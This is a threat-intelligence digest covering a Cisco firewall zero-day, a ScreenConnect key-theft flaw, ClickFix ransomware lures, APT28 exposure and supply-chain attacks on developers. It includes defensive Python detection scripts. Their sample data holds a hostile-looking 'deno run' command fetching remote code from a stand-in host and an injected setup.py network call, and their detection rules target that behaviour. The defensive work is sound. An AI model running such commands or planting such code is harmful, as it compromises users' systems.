Cisco zero-day 🔥, ScreenConnect key theft 🔑, ClickFix lures 🎣, APT28 exposure 🇷🇺, VSCode attacks ⚙️
Daily Threat Intel Digest - 2026-03-19
🔴 Critical Threats & Active Exploitation
[NEW] Critical Zero-Day in Cisco Firewalls Exploited for Ransomware
A critical unauthenticated remote code execution (RCE) vulnerability in Cisco Secure Firewall Management Center (FMC), tracked as CVE-2026-20131 (CVSS 10.0), is being actively exploited in the wild to deploy Interlock ransomware. The flaw stems from an insecure deserialization issue in the web management interface that allows attackers to execute arbitrary code with root privileges without authentication. Exploitation attempts have been detected as early as January 26, 2026, giving threat actors a significant head start. Following successful exploitation, attackers deploy a PowerShell reconnaissance script, followed by custom Remote Access Trojans (RATs) using encrypted WebSocket communications to maintain persistence. Cisco has confirmed no effective workarounds exist, making immediate patching the only viable mitigation for organizations using affected FMC deployments [Cyberpress; GBHackers].
[NEW] ScreenConnect Flaw Enables Machine Key Theft and Session Hijacking
ConnectWise has issued a Priority 1 emergency update for ScreenConnect remote desktop software to address a critical authentication bypass vulnerability, CVE-2026-3564 (CVSS 9.0). The flaw allows attackers to extract machine-level cryptographic keys from server configuration files and forge authentication tokens, enabling them to hijack active user sessions without credentials. This vulnerability poses a severe supply chain risk due to ScreenConnect’s widespread use by Managed Service Providers (MSPs) and enterprise IT environments. ConnectWise has released version 26.1, which replaces plaintext key storage with encrypted key management. While cloud-hosted instances are automatically patched, administrators of on-premise deployments must manually update immediately to prevent session hijacking [Cyberpress; GBHackers].
[NEW] LeakNet Ransomware Abuses ClickFix Lures and Fileless Loaders
The LeakNet ransomware group has adopted a new attack chain combining “ClickFix” social engineering lures with a fileless Deno loader to infect victims at scale. Attackers compromise legitimate websites to display fake Cloudflare Turnstile verification pages, tricking users into copying and pasting malicious commands into their terminal. This approach bypasses the need to purchase initial access on dark web markets. Once executed, the Deno loader runs entirely in memory, fetching payloads and C2 instructions without writing files to disk, making detection difficult for traditional antivirus. Defenders should monitor for unusual browser-initiated commands and unexpected connections to cloud storage from standard endpoints [Cyberpress].
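The "browser-initiated commands" check above, as an added detection sketch that is not part of the Cyberpress reporting: it scores constructed process-creation events (parent image, child image, command line) for the lineage and command-line traits a ClickFix-style launch tends to show. The browser and interpreter name lists, the scoring rules, and the sample events are assumptions, not indicators from the digest.

```python
import re

# Constructed process-creation events shaped like minimal EDR/Sysmon records.
# None of these are real telemetry; URLs use the reserved .invalid TLD.
SAMPLE_EVENTS = [
    {"parent": "chrome.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c deno run -A https://placeholder.invalid/l.ts"},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},
    {"parent": "firefox.exe", "image": "notepad.exe",
     "cmdline": "notepad.exe readme.txt"},
    {"parent": "firefox.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -c https://placeholder.invalid/x"},
]

# Assumed lists; tune to the browsers and interpreters present in your estate.
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "deno.exe", "deno"}
URL_RE = re.compile(r"""https?://[^\s'"]+""", re.IGNORECASE)


def classify_event(ev):
    """Return the reasons an event looks ClickFix-like; an empty list means benign."""
    reasons = []
    parent = ev["parent"].lower()
    image = ev["image"].lower()
    cmd = ev["cmdline"]
    tokens = cmd.lower().split()
    if parent in BROWSERS and image in INTERPRETERS:
        reasons.append("browser spawned a command interpreter")
    if image in INTERPRETERS and URL_RE.search(cmd):
        reasons.append("interpreter handed a remote URL on the command line")
    if "deno" in tokens and "run" in tokens:
        # Matches the in-memory Deno loader stage described in the digest.
        reasons.append("deno run invocation from a shell")
    return reasons


def detect(events):
    """Map each suspicious command line to its list of reasons."""
    return {ev["cmdline"]: classify_event(ev) for ev in events if classify_event(ev)}
```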
🎯 Threat Actor Activity & Campaigns
[NEW] FancyBear Operations Exposed via Server Misconfiguration
An operational security failure by the Russian state-sponsored group FancyBear (APT28) has exposed the inner workings of a massive credential theft campaign. Researchers discovered an open directory on a command-and-control server that had been active for over 500 days, revealing a toolkit designed to exploit webmail platforms like Roundcube and SquirrelMail. The exposed logs indicate the group successfully exfiltrated 2,800 emails, stole 240 sets of credentials including 2FA secrets, and harvested 11,500 contacts from European government and military entities, primarily in nations supporting Ukraine. The discovery provides rare visibility into the telemetry and success metrics of a long-running espionage operation [Cyberpress].
[NEW] WaterPlum Deploys “StoatWaffle” in VSCode Supply Chain Attack
The North Korea-linked threat group WaterPlum (specifically the “Team 8” or Modilus cluster) is continuing its “Contagious Interview” campaign by distributing a new malware strain dubbed “StoatWaffle.” The attack targets the software supply chain by compromising VS Code development environments. This activity follows a trend of state-sponsored actors abusing trusted developer tools to establish initial access, leveraging the legitimacy of these platforms to bypass security controls [GBHackers].
[UPDATE] ForceMemo Campaign Backdoors Python Repositories via Token Theft
New details have emerged regarding the GlassWorm supply chain attack (first reported March 14), now tracked as the “ForceMemo” campaign. Threat actors are using previously stolen GitHub authentication tokens, harvested via malicious VS Code and Cursor extensions, to force-push malicious code into hundreds of Python repositories. The injected code, often appended to setup.py files, reaches out to the Solana blockchain for command-and-control (C2) rather than traditional servers, a technique designed to evade network detection. Security teams should check for committer emails set to “null” and anomalous connections to Solana endpoints in their development environments [Cyberpress].
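The two checks recommended above, as an added repository audit script that is not part of the Cyberpress reporting: it flags commits whose committer email is the literal string "null" in a `git log --format='%h%x09%ce%x09%s'` listing, and scans a setup.py source for Solana-looking endpoints. The git log lines and setup.py excerpt are constructed samples; the digest names no specific endpoints, so the hostname regex is an assumption and the sample uses Solana's public mainnet RPC hostname only as an illustration.

```python
import re
import subprocess

# Constructed output of: git log --format='%h%x09%ce%x09%s' (no real repository).
SAMPLE_GIT_LOG = """\
a1b2c3d\talice@example.org\tAdd packaging metadata
e5f6a7b\tnull\tUpdate setup.py
0f1e2d3\tbob@example.org\tFix typo
"""

# Constructed setup.py excerpt standing in for an injected block; the network
# call is the trait to flag, not the package metadata around it.
SAMPLE_SETUP_PY = """\
from setuptools import setup
import urllib.request
_cfg = urllib.request.urlopen("https://api.mainnet-beta.solana.com").read()
setup(name="demo-pkg", version="0.1.0")
"""

# Assumed heuristic: any URL whose host contains "solana". Extend as needed.
SOLANA_RE = re.compile(r"https?://[\w.-]*solana[\w.-]*", re.IGNORECASE)


def collect_git_log(repo_path):
    """Run git in repo_path and return log text in the tab-separated layout above."""
    return subprocess.run(
        ["git", "-C", repo_path, "log", "--format=%h%x09%ce%x09%s"],
        check=True, capture_output=True, text=True,
    ).stdout


def null_committer_commits(log_text):
    """Return (short_hash, subject) for commits whose committer email is 'null'."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split("\t", 2)
        if len(parts) == 3 and parts[1].strip().lower() == "null":
            hits.append((parts[0], parts[2]))
    return hits


def solana_references(source):
    """Return the distinct Solana-looking URLs found in a source file."""
    return sorted({m.group(0) for m in SOLANA_RE.finditer(source)})


def audit_repository(log_text, setup_py_source):
    """Combine both checks into one report; empty lists mean nothing was flagged."""
    return {"null_committer": null_committer_commits(log_text),
            "solana_endpoints": solana_references(setup_py_source)}
```

For a live repository, feed `collect_git_log(path)` and the contents of its setup.py into `audit_repository`.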